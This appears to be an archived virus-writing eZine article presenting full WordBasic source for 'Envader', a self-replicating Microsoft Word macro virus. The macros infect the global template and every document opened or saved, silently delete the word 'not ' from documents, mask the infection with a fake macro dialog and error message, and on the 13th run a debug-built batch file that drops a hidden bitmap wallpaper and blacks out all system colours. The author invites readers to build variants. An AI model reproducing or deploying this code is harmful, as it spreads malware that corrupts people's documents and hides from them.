Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM2.029: The WinWord.Envader Virus by Gothmog/[DHA]

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 23 Feb 2022

The WinWord.Envader Virus by Gothmog/[DHA]

Well, with all the commotion of Microsoft Word Macro viruses there seems to be out there these days, I decided to give it a try. After all, how can you fully understand something you haven't done? [one of the small perks of the Vx community: you do have the upper hand in understanding how viruses work and how to remove them...]

In any case, here's what I came up with after about an hour. `Tis true, what they say -- that it is far easier to write a macro virus than a virus in asm or any other `real' language. [hell, if it contributes to the virus problem i don't care a damn what it's written in <g>...] Anyway, here's the source, and a working (& encrypted) copy is included with the other viruses in this issue as ENVADER.DOC (read the document, it's _interesting_, shall i say :)

The AutoExec macro checks to see if the normal template is infected; if this template has all of the virus's macros, it is assumed to be infected, and if it has anything less, it will be infected by the virus. It also changes the user name in MS Word and in the WIN.INI file to 'Envader', just for fun. 

=[ macro AutoExec ]================================================ 
sub main ' AutoExec 
on error goto paki 
DisableInput 1 
ScreenUpdating 0 
DisableAutoMacros 0 
ToolsOptionsSave.GlobalDotPrompt = 0 
j = 0 
for i = 1 to CountMacros(0, 0) 
   if MacroName$(i, 0, 0) = "AutoExec" then 
      j = j + 1 
   elseif MacroName$(i, 0, 0) = "FileSaveAs" then 
      j = j + 1 
   elseif MacroName$(i, 0, 0) = "FileOpen" then 
      j = j + 1 
   elseif MacroName$(i, 0, 0) = "FileClose" then 
      j = j + 1 
   elseif MacroName$(i, 0, 0) = "FileExit" then 
      j = j + 1 
   elseif MacroName$(i, 0, 0) = "ToolsMacro" then 
      j = j + 1 
   end if 
next i 
if j < 6 then 
   ToolsOptionsGeneral.RecentFiles = 0 
   ToolsCustomizeMenus .Name = "FileTemplates", .Menu = "File", .Remove 
   ToolsCustomizeMenus .Name = "ToolsCustomize", .Menu = "Tools", .Remove 
   MacroCopy FileName$() + ":AutoExec", "Global:AutoExec", 1 
   MacroCopy FileName$() + ":FileSaveAs", "Global:FileSaveAs", 1 
   MacroCopy FileName$() + ":FileOpen", "Global:FileOpen", 1 
   MacroCopy FileName$() + ":FileClose", "Global:FileClose", 1 
   MacroCopy FileName$() + ":FileExit", "Global:FileExit", 1 
   MacroCopy FileName$() + ":ToolsMacro", "Global:ToolsMacro", 1 
   ToolsOptionsUserInfo .Name = "Envader", .Initials = "", .Address = "" 
   SetProfileString "MS User Info", "DefName", "Envader" 
end if 
ScreenUpdating 1 
DisableInput 0 
paki: 
end sub 
===================================================[ macro ends ]==


The FileSaveAs macro infects the document being saved, and first changes all occurrances of the word `not' to nothing (this is hard to notice, because the syntax of the document stays correct...) 

=[ macro FileSaveAs ]============================================== 
sub main ' FileSaveAs 
dim dlg As FileSaveAs 
DisableAutoMacros 0 
DisableInput 1 
ScreenUpdating 0 
EditReplace .Find = "not ", .Replace = "", .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 
ScreenUpdating 1 
DisableInput 0 
GetCurValues dlg 
Dialog dlg 
if (Dlg.Format = 0) or (dlg.Format = 1) then 
   MacroCopy "AutoExec", WindowName$() + ":AutoExec", 1 
   MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1 
   MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1 
   MacroCopy "FileClose", WindowName$() + ":FileClose", 1 
   MacroCopy "FileExit", WindowName$() + ":FileExit", 1 
   MacroCopy "ToolsMacro", WindowName$() + ":ToolsMacro", 1 
   Dlg.Format = 1 
end if 
FileSaveAs dlg 
end sub 
===================================================[ macro ends ]==


The FileOpen macro will infect document or template files as they are opened in order to a) infect old documents the user created, and b) hide the source of the viral infection. (The user will scan his documents, and is sure to be confused if some document he's been working on for months is infected...) 

=[ macro FileOpen ]================================================ 
sub main ' FileOpen 
dim dlg as FileOpen 
DisableAutoMacros 0 
GetCurValues dlg 
Dialog dlg 
FileOpen dlg 
if (Dlg.Format = 0) or (dlg.Format = 1) then 
   MacroCopy "AutoExec", Dlg.Name + ":AutoExec", 1 
   MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1 
   MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1 
   MacroCopy "FileClose", Dlg.Name + ":FileClose", 1 
   MacroCopy "FileExit", Dlg.Name + ":FileExit", 1 
   MacroCopy "ToolsMacro", Dlg.Name + ":ToolsMacro", 1 
   FileSaveAs.Format = 1 
end if 
end sub 
===================================================[ macro ends ]==


The FileClose macro will take effect if the user has disabled automacros; if an infected document is opened while automacros are disabled and then closed using the `File | Close' command, automacros will be enabled and the virus's autoexec macro will be executed. 

=[ macro FileClose ]=============================================== 
sub main ' FileClose 
DisableAutoMacros 0 
AutoExec 
FileClose 
end sub 
===================================================[ macro ends ]==


The FileExit macro checks to see if it is the 12th of the month, then shows a dialog box saying "It shall arrive..."; on the 13th of the month, it will create a batch file c:\wp.bat and execute it. This will create the c:\wp.bmp file. This macro will then change c:\windows\win.ini's wallpaper settings to point to the c:\wp.bmp file, and change all the system colors to black... 

=[ macro FileExit ]================================================ 
sub main ' FileExit 
on error goto bollocks 
if Day(Now()) = 12 then 
   msgbox "It shall arive...", "Envader", 48 
end if 
if Day(Now()) <> 13 then 
   goto bollocks 
end if 
DisableInput 1 
ScreenUpdating 0 
open "c:\dos\debug.exe" for input as #1 
close #1 
open "c:\wp.bat" For output as #1 
print #1, "@echo off" 
print #1, "ctty nul" 
print #1, "echo n c:\wp.bmp > c:\wp.scr" 
print #1, "echo e 0100 42 4D 5C 08 00 00 00 00 00 00 36 04 00 00 28 00 >> c:\wp.scr" 
print #1, "echo e 0110 00 00 43 00 00 00 32 00 00 00 01 00 08 00 01 00 >> c:\wp.scr" 
print #1, "echo e 0120 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 01 >> c:\wp.scr" 
print #1, "echo e 0130 00 00 00 01 00 00 06 08 08 00 08 10 10 00 10 10 >> c:\wp.scr" 
print #1, "echo e 0140 10 00 10 18 18 00 18 08 18 00 18 0C 20 00 18 18 >> c:\wp.scr" 
print #1, "echo e 0150 18 00 20 0D 20 00 20 1B 28 00 20 20 20 00 28 14 >> c:\wp.scr" 
print #1, "echo e 0160 28 00 2C 2D 35 00 34 18 30 00 38 18 38 00 38 33 >> c:\wp.scr" 
print #1, "echo e 0170 38 00 38 60 60 00 40 20 38 00 40 20 40 00 40 3B >> c:\wp.scr" 
print #1, "echo e 0180 40 00 40 70 70 00 48 20 40 00 48 28 40 00 48 30 >> c:\wp.scr" 
print #1, "echo e 0190 40 00 48 46 49 00 50 28 40 00 50 29 48 00 50 4A >> c:\wp.scr" 
print #1, "echo e 01A0 50 00 58 29 48 00 58 30 50 00 58 38 50 00 60 30 >> c:\wp.scr" 
print #1, "echo e 01B0 50 00 60 30 58 00 60 38 58 00 63 62 65 00 64 48 >> c:\wp.scr" 
print #1, "echo e 01C0 5C 00 68 38 58 00 68 38 60 00 70 38 60 00 70 68 >> c:\wp.scr" 
print #1, "echo e 01D0 70 00 70 70 70 00 78 38 60 00 78 40 68 00 7E 4D >> c:\wp.scr" 
print #1, "echo e 01E0 6D 00 80 40 68 00 80 40 70 00 88 48 70 00 98 98 >> c:\wp.scr" 
print #1, "echo e 01F0 98 00 98 D0 D0 00 98 D8 D0 00 A0 50 88 00 A0 58 >> c:\wp.scr" 
print #1, "echo e 0200 88 00 A0 70 90 00 A0 78 90 00 A0 88 98 00 A0 90 >> c:\wp.scr" 
print #1, "echo e 0210 98 00 A0 90 A8 00 A0 9F A0 00 A0 A0 A8 00 A0 A8 >> c:\wp.scr" 
print #1, "echo e 0220 A0 00 A0 C8 C8 00 A0 D8 D8 00 A3 A1 B0 00 A8 58 >> c:\wp.scr" 
print #1, "echo e 0230 88 00 A8 58 90 00 A8 6C 94 00 A8 8B 9D 00 A8 B8 >> c:\wp.scr" 
print #1, "echo e 0240 B8 00 A8 DC D6 00 A8 E0 E0 00 B0 58 90 00 B0 60 >> c:\wp.scr" 
print #1, "echo e 0250 90 00 B0 60 98 00 B0 E8 E0 00 B2 B3 B5 00 B3 68 >> c:\wp.scr" 
print #1, "echo e 0260 98 00 B8 60 98 00 B8 68 A0 00 B8 E8 E8 00 B8 F0 >> c:\wp.scr" 
print #1, "echo e 0270 E8 00 BB 76 A3 00 BE C5 C5 00 C0 60 A0 00 C0 68 >> c:\wp.scr" 
print #1, "echo e 0280 A0 00 C0 F0 E8 00 C0 F0 F0 00 C0 FF F0 00 C8 68 >> c:\wp.scr" 
print #1, "echo e 0290 A0 00 C8 68 A8 00 C8 70 B0 00 C8 78 B0 00 C8 FF >> c:\wp.scr" 
print #1, "echo e 02A0 F0 00 C8 FF FF 00 C9 98 B8 00 C9 C6 C8 00 CA 80 >> c:\wp.scr" 
print #1, "echo e 02B0 B3 00 D0 68 A8 00 D0 70 B0 00 D0 CD D3 00 D0 F0 >> c:\wp.scr" 
print #1, "echo e 02C0 FF 00 D0 FF FF 00 D4 D8 D8 00 D8 70 B0 00 D8 78 >> c:\wp.scr" 
print #1, "echo e 02D0 B0 00 D8 78 B8 00 D8 80 B8 00 D8 FF FF 00 DC E0 >> c:\wp.scr" 
print #1, "echo e 02E0 E0 00 DC E8 E8 00 DD 93 C8 00 E0 80 B8 00 E0 80 >> c:\wp.scr" 
print #1, "echo e 02F0 C0 00 E0 88 C0 00 E0 98 C0 00 E0 FF FF 00 E8 88 >> c:\wp.scr" 
print #1, "echo e 0300 C0 00 E8 90 C8 00 E8 98 C8 00 E8 98 D0 00 E8 CF >> c:\wp.scr" 
print #1, "echo e 0310 DE 00 E8 F0 F0 00 E8 FF FF 00 F0 98 D0 00 F0 A0 >> c:\wp.scr" 
print #1, "echo e 0320 D0 00 F0 A1 D8 00 F0 F0 F0 00 F0 FF FF 00 F2 D9 >> c:\wp.scr" 
print #1, "echo e 0330 E8 00 FC C7 F0 00 FE B0 E0 00 FF 88 88 00 FF A8 >> c:\wp.scr" 
print #1, "echo e 0340 DB 00 FF B4 E8 00 FF C8 FF 00 FF D0 FF 00 FF D8 >> c:\wp.scr" 
print #1, "echo e 0350 FF 00 FF E0 FF 00 FF E8 FF 00 FF F0 FF 00 FF FF >> c:\wp.scr" 
print #1, "echo e 0360 FF 00 00 00 21 00 19 45 D4 00 01 DF 46 00 00 4C >> c:\wp.scr" 
print #1, "echo e 0370 92 00 21 7E 00 00 92 00 01 00 00 00 4C 00 00 21 >> c:\wp.scr" 
print #1, "echo e 0380 7E 00 45 D4 00 00 01 37 1E 00 4C 92 00 00 7E 00 >> c:\wp.scr" 
print #1, "echo e 0390 00 00 00 00 21 00 9E 45 D4 00 20 9F 0B 00 6F 00 >> c:\wp.scr" 
print #1, "echo e 03A0 0F 00 E8 8C FF 00 52 23 7E 00 4A 10 25 00 52 46 >> c:\wp.scr" 
print #1, "echo e 03B0 25 00 00 00 25 00 00 23 7E 00 45 D4 00 00 60 00 >> c:\wp.scr" 
print #1, "echo e 03C0 00 00 7C A6 49 00 00 00 00 00 64 47 00 00 7B 64 >> c:\wp.scr" 
print #1, "echo e 03D0 04 00 E9 AC 63 00 7E 00 00 00 00 00 23 00 00 23 >> c:\wp.scr" 
print #1, "echo e 03E0 7E 00 21 7E 00 00 D4 00 00 00 00 01 45 00 00 4C >> c:\wp.scr" 
print #1, "echo e 03F0 92 00 20 7E 00 00 D4 00 00 00 46 25 45 00 00 25 >> c:\wp.scr" 
print #1, "echo e 0400 52 00 24 7E 20 00 D4 00 00 00 1E 06 45 00 FE 82 >> c:\wp.scr" 
print #1, "echo e 0410 B4 00 00 00 20 00 F7 00 03 00 00 42 05 00 10 17 >> c:\wp.scr" 
print #1, "echo e 0420 BF 00 00 60 01 00 D2 20 DF 00 00 94 26 00 00 05 >> c:\wp.scr" 
print #1, "echo e 0430 F7 00 E9 FE 10 00 6F 49 60 00 0A C4 04 00 00 03 >> c:\wp.scr" 
print #1, "echo e 0440 6F 00 00 00 00 00 D0 00 00 00 5E DC E8 00 58 00 >> c:\wp.scr" 
print #1, "echo e 0450 10 00 03 20 02 00 C4 2F B7 00 07 9F 0A 00 12 5C >> c:\wp.scr" 
print #1, "echo e 0460 80 00 00 9A 01 00 AC 01 79 00 01 12 00 00 79 00 >> c:\wp.scr" 
print #1, "echo e 0470 9A 00 00 AC 01 00 0A 49 60 00 00 01 7D 00 19 01 >> c:\wp.scr" 
print #1, "echo e 0480 B5 00 01 DF 46 00 00 20 7E 00 20 7E 00 00 D4 00 >> c:\wp.scr" 
print #1, "echo e 0490 00 00 00 00 45 00 52 00 00 00 05 F7 25 00 F7 23 >> c:\wp.scr" 
print #1, "echo e 04A0 C2 00 00 42 05 00 0F 17 BF 00 E9 FE 20 00 A8 00 >> c:\wp.scr" 
print #1, "echo e 04B0 07 00 00 00 EA 00 00 20 7E 00 EA D4 00 00 7E 00 >> c:\wp.scr" 
print #1, "echo e 04C0 00 00 23 7E 23 00 07 20 DF 00 EA BC 00 00 7E 00 >> c:\wp.scr" 
print #1, "echo e 04D0 00 00 00 00 20 00 00 EA E8 00 23 7E 00 00 56 E9 >> c:\wp.scr" 
print #1, "echo e 04E0 38 00 04 7F 39 00 96 E9 88 00 00 00 82 00 1E E9 >> c:\wp.scr" 
print #1, "echo e 04F0 DA 00 04 7F 37 00 B7 E9 5E 00 E9 88 2F 00 7E 2F >> c:\wp.scr" 
print #1, "echo e 0500 B7 00 0B 9E 23 00 0F 07 9F 00 FF 6F 00 00 7E E9 >> c:\wp.scr" 
print #1, "echo e 0510 9C 00 25 52 23 00 12 00 00 00 00 13 00 00 13 05 >> c:\wp.scr" 
print #1, "echo e 0520 F7 00 00 9B 01 00 9A 01 12 00 01 79 00 00 62 00 >> c:\wp.scr" 
print #1, "echo e 0530 AC 00 2F B7 E9 00 1B 81 01 60 27 81 00 00 1B 81 >> c:\wp.scr" 
print #1, "echo e 0540 01 60 01 2B 26 81 00 00 1B 81 01 51 01 51 26 81 >> c:\wp.scr" 
print #1, "echo e 0550 00 00 1B 81 01 21 01 60 26 81 00 00 1C 81 01 60 >> c:\wp.scr" 
print #1, "echo e 0560 1B 81 01 32 01 60 09 81 00 00 1C 81 01 60 1A 81 >> c:\wp.scr" 
print #1, "echo e 0570 01 5F 01 60 0A 81 00 00 1C 81 01 60 18 81 00 03 >> c:\wp.scr" 
print #1, "echo e 0580 04 5F 1B 00 0B 81 00 00 07 81 01 57 01 2D 13 81 >> c:\wp.scr" 
print #1, "echo e 0590 01 5F 17 81 01 5F 01 5F 0D 81 00 00 09 81 01 57 >> c:\wp.scr" 
print #1, "echo e 05A0 12 81 01 31 01 2D 15 81 01 73 01 5F 0E 81 00 00 >> c:\wp.scr" 
print #1, "echo e 05B0 0A 81 01 47 01 2D 10 81 01 0B 01 5F 13 81 01 17 >> c:\wp.scr" 
print #1, "echo e 05C0 01 60 10 81 00 00 0C 81 01 5F 01 04 0F 81 01 60 >> c:\wp.scr" 
print #1, "echo e 05D0 12 81 01 4B 01 60 11 81 00 00 0D 81 01 52 01 3E >> c:\wp.scr" 
print #1, "echo e 05E0 0E 81 00 08 5F 2D 14 51 3F 19 04 0E 0A 81 01 5F >> c:\wp.scr" 
print #1, "echo e 05F0 01 47 12 81 00 00 0F 81 01 5F 01 09 0A 81 00 0D >> c:\wp.scr" 
print #1, "echo e 0600 0B 6D 60 04 60 60 5F 60 60 51 23 04 0E 00 05 81 >> c:\wp.scr" 
print #1, "echo e 0610 01 04 01 60 05 81 01 31 0E 81 00 00 10 81 01 5F >> c:\wp.scr" 
print #1, "echo e 0620 01 4B 06 81 00 16 1E 60 5F 81 81 60 5F 81 0C 2B >> c:\wp.scr" 
print #1, "echo e 0630 81 81 81 7E 04 81 57 2B 04 04 31 60 04 81 01 2C >> c:\wp.scr" 
print #1, "echo e 0640 01 32 0F 81 00 00 12 81 00 06 60 2B 81 1B 57 60 >> c:\wp.scr" 
print #1, "echo e 0650 04 81 00 07 28 51 81 81 60 82 5F 00 04 81 00 0B >> c:\wp.scr" 
print #1, "echo e 0660 7B 21 81 81 60 60 81 81 81 27 60 00 11 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0670 13 81 00 03 52 5F 1A 00 05 81 01 3F 04 81 00 04 >> c:\wp.scr" 
print #1, "echo e 0680 04 04 60 04 05 81 01 7B 01 1A 04 81 01 5F 13 81 >> c:\wp.scr" 
print #1, "echo e 0690 00 00 16 81 00 05 14 81 81 81 4B 00 05 81 00 04 >> c:\wp.scr" 
print #1, "echo e 06A0 60 88 60 04 07 81 00 04 60 2D 5F 58 14 81 00 00 >> c:\wp.scr" 
print #1, "echo e 06B0 17 81 00 03 2A 0C 3F 00 07 81 00 03 47 81 45 00 >> c:\wp.scr" 
print #1, "echo e 06C0 08 81 01 21 16 81 00 00 20 81 00 04 60 79 5F 47 >> c:\wp.scr" 
print #1, "echo e 06D0 1F 81 00 00 20 81 01 32 01 5F 21 81 00 00 20 81 >> c:\wp.scr" 
print #1, "echo e 06E0 00 03 4B 60 45 00 20 81 00 00 20 81 01 56 01 60 >> c:\wp.scr" 
print #1, "echo e 06F0 21 81 00 00 20 81 00 03 3E 5F 31 00 20 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0700 20 81 00 03 60 60 5F 00 20 81 00 00 20 81 01 10 >> c:\wp.scr" 
print #1, "echo e 0710 01 2C 21 81 00 00 20 81 00 03 60 83 5F 00 20 81 >> c:\wp.scr" 
print #1, "echo e 0720 00 00 1F 81 00 05 04 25 23 23 10 00 1F 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0730 1D 81 01 04 01 04 04 25 01 14 01 10 1E 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0740 1C 81 01 04 01 04 05 25 00 04 28 14 10 10 1C 81 >> c:\wp.scr" 
print #1, "echo e 0750 00 00 1A 81 00 03 04 04 04 00 04 28 04 29 00 03 >> c:\wp.scr" 
print #1, "echo e 0760 15 14 11 00 1B 81 00 00 18 81 00 12 04 04 2B 7C >> c:\wp.scr" 
print #1, "echo e 0770 27 56 77 56 77 57 7C 5F 50 5D 5F 3F 14 10 19 81 >> c:\wp.scr" 
print #1, "echo e 0780 00 00 18 81 00 05 04 1E 7C 7C 2E 00 04 1F 05 23 >> c:\wp.scr" 
print #1, "echo e 0790 00 05 64 6A 23 3F 3E 00 18 81 00 00 18 81 00 13 >> c:\wp.scr" 
print #1, "echo e 07A0 04 04 27 7C 23 23 23 24 24 25 24 25 24 25 6A 6A >> c:\wp.scr" 
print #1, "echo e 07B0 47 3F 32 00 18 81 00 00 18 81 00 13 04 04 04 2E >> c:\wp.scr" 
print #1, "echo e 07C0 27 24 77 25 23 25 77 28 7C 61 6A 51 47 45 3E 00 >> c:\wp.scr" 
print #1, "echo e 07D0 18 81 00 00 18 81 00 13 04 04 04 23 25 25 6A 28 >> c:\wp.scr" 
print #1, "echo e 07E0 28 28 29 29 34 33 31 52 47 45 3E 00 18 81 00 00 >> c:\wp.scr" 
print #1, "echo e 07F0 18 81 00 13 04 04 04 60 60 5F 60 60 60 65 6D 79 >> c:\wp.scr" 
print #1, "echo e 0800 83 87 56 51 4B 45 3E 00 18 81 00 00 18 81 00 13 >> c:\wp.scr" 
print #1, "echo e 0810 02 04 04 5F 5F 60 60 5F 60 66 6E 79 80 88 57 52 >> c:\wp.scr" 
print #1, "echo e 0820 4B 45 3E 00 18 81 00 00 18 81 00 13 04 04 04 60 >> c:\wp.scr" 
print #1, "echo e 0830 60 60 5F 5F 60 66 6D 79 83 87 56 52 4B 45 3E 00 >> c:\wp.scr" 
print #1, "echo e 0840 18 81 00 00 18 81 00 06 04 04 04 65 60 5F 04 60 >> c:\wp.scr" 
print #1, "echo e 0850 00 09 68 73 82 85 57 52 4B 46 3E 00 18 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0860 18 81 00 13 04 02 00 3B 4E 5A 60 5F 60 60 67 6E >> c:\wp.scr" 
print #1, "echo e 0870 2F 54 55 46 4B 45 3E 00 18 81 00 00 18 81 00 13 >> c:\wp.scr" 
print #1, "echo e 0880 04 04 3B 55 78 78 78 5F 60 60 66 2F 69 71 71 71 >> c:\wp.scr" 
print #1, "echo e 0890 4B 45 3E 00 18 81 00 00 17 81 00 0D 27 04 42 2F >> c:\wp.scr" 
print #1, "echo e 08A0 63 71 78 78 69 60 60 41 54 00 04 78 00 03 4E 45 >> c:\wp.scr" 
print #1, "echo e 08B0 3E 00 18 81 00 00 17 81 00 14 21 04 3A 30 01 0E >> c:\wp.scr" 
print #1, "echo e 08C0 8A 78 78 60 60 2E 55 78 09 02 78 63 45 3E 18 81 >> c:\wp.scr" 
print #1, "echo e 08D0 00 00 17 81 00 14 1A 04 3A 2F 01 02 78 78 48 60 >> c:\wp.scr" 
print #1, "echo e 08E0 60 5F 4D 71 02 02 78 44 3F 3E 18 81 00 00 18 81 >> c:\wp.scr" 
print #1, "echo e 08F0 00 12 04 04 2F 4D 69 78 69 5F 60 5F 5F 3B 54 71 >> c:\wp.scr" 
print #1, "echo e 0900 71 63 4B 3F 19 81 00 00 1A 81 00 0F 04 60 42 5F >> c:\wp.scr" 
print #1, "echo e 0910 60 60 5F 60 5F 60 60 3B 56 4B 10 00 1A 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0920 1B 81 00 04 04 28 29 29 05 2B 00 03 2C 2B 14 00 >> c:\wp.scr" 
print #1, "echo e 0930 1C 81 00 00 1C 81 01 08 01 25 04 28 00 04 29 29 >> c:\wp.scr" 
print #1, "echo e 0940 29 14 1D 81 00 00 1E 81 01 0C 05 25 1F 81 00 00 >> c:\wp.scr" 
print #1, "echo e 0950 1F 81 00 04 04 23 25 23 20 81 00 01 >> c:\wp.scr" 
print #1, "echo rcx >> c:\wp.scr" 
print #1, "echo 085C >> c:\wp.scr" 
print #1, "echo w >> c:\wp.scr" 
print #1, "echo q >> c:\wp.scr" 
print #1, "debug < c:\wp.scr" 
print #1, "del c:\wp.scr" 
print #1, "attrib +h +r +s c:\wp.bmp" 
print #1, "del c:\wp.bat" 
print #1, "" 
close #1 
shell "c:\wp.bat", 0 
SetProfileString "Desktop", "Wallpaper", "C:\WP.BMP" 
SetProfileString "Desktop", "TileWallpaper", "1" 
SetProfileString "Desktop", "WallpaperStyle", "0" 
SetProfileString "colors", "Scrollbar", "0 0 0" 
SetProfileString "colors", "Background", "0 0 0" 
SetProfileString "colors", "ActiveTitle", "0 0 0" 
SetProfileString "colors", "InactiveTitle", "0 0 0" 
SetProfileString "colors", "Menu", "0 0 0" 
SetProfileString "colors", "Window", "0 0 0" 
SetProfileString "colors", "WindowFrame", "0 0 0" 
SetProfileString "colors", "MenuText", "0 0 0" 
SetProfileString "colors", "WindowText", "0 0 0" 
SetProfileString "colors", "TitleText", "0 0 0" 
SetProfileString "colors", "ActiveBorder", "0 0 0" 
SetProfileString "colors", "InactiveBorder", "0 0 0" 
SetProfileString "colors", "AppWorkspace", "0 0 0" 
SetProfileString "colors", "Hilight", "0 0 0" 
SetProfileString "colors", "HilightText", "0 0 0" 
SetProfileString "colors", "ButtonFace", "0 0 0" 
SetProfileString "colors", "ButtonShadow", "0 0 0" 
SetProfileString "colors", "GrayText", "0 0 0" 
SetProfileString "colors", "ButtonText", "0 0 0" 
SetProfileString "colors", "InactiveTitleText", "0 0 0" 
SetProfileString "colors", "ButtonHilight", "0 0 0" 
SetProfileString "colors", "ButtonDkShadow", "0 0 0" 
SetProfileString "colors", "ButtonLight", "0 0 0" 
SetProfileString "colors", "InfoText", "0 0 0" 
SetProfileString "colors", "InfoWindow", "0 0 0" 
ScreenUpdating 1 
DisableInput 0 
bollocks: 
on error goto wanker 
DisableAutoMacros 0 
AutoExec 
wanker: 
FileExit 
end sub 
===================================================[ macro ends ]==


Here's a simple ToolsMacro macro to stealth the virus's presence: (Thanks to Nightmare Joker, I modified the dialog box from his MooNRaiDer virus to make this one...) 

=[ macro ToolsMacro ]============================================== 
sub main ' ToolsMacro 
Dim ComboBox1$(0) 
ComboBox1$(0) = "" 
Dim ListBox1$(0) 
ListBox1$(0) = "" 
Dim DropListBox2$(0) 
DropListBox2$(0) = "Normal.dot" 
DisableAutoMacros 0 
begin Dialog UserDialog 442, 320, "Macro" 
PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2 
   CancelButton 290, 43, 141, 21 
   PushButton 290, 72, 141, 21, "&Run", .Definierbar3 
   PushButton 290, 102, 141, 21, "&Edit", .Definierbar4 
   PushButton 290, 130, 141, 21, "&Delete", .Definierbar5 
   PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6 
   ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1 
   Text 6, 223, 93, 13, "Macros &Available In:", .Text1 
   Text 7, 259, 109, 13, "Descr&iption:", .Text2 
   Text 7, 6, 93, 13, "Macros:", .Text3 
   ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1 
   DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2 
end Dialog 
Redim dlg as UserDialog 
if Dialog(dlg) = 0 then 
   Cancel 
else 
   MsgBox "Not enough memory", "WordBasic Err = 7" 
end if 
end sub 
===================================================[ macro ends ]==


Well, that's it; it is pretty dumb, nothing really great here, but keep this in mind: it's my first macro virus, i don't have any real experience with ms wordbasic (can't seem to find the help file either :), and i'm writing this bitch at 3:00 in the morning. Any errors, correct them; if you want to make a variant of this virus, go right ahead, just give me some credit.


Later all,
Gothmog/[DHA]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
20 May 2024
Sabung Ayam Online
guest's profile picture
@guest
19 May 2024
Situs Sabung Ayam Digmaan
guest's profile picture
@guest
19 May 2024
Thanks for great information I was looking for this info for my mission.
DrWatson's profile picture
@DrWatson
18 May 2024
It's a fascinating theory. No one actually knows what is inside the Earth. To date we have only assumptions based on indirect measuremen ...
DrWatson's profile picture
@DrWatson
18 May 2024
Ohh ... another comment 😁 My article is becoming very popular 😃
guest's profile picture
@guest
18 May 2024
오우쉤
guest's profile picture
@guest
18 May 2024
Is it true that in addition to the temperature, it must not undergo vibrations and/or movements during fermentation?
DrWatson's profile picture
@DrWatson
18 May 2024
Hi Jeroen :) I am happy to read your message. I remember playing with your starfield back in the days. I had a look at figuro.io and i ...
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
18 May 2024
Thank you for the comment 😊 This theory was formulated starting from the 17th century, when no appropriate scientific studies had yet been ...
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
18 May 2024
Many cultures are slowly disappearing also today and with them ancient knowledge thousands of years old. Ancient knowledge must be preserved ...
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT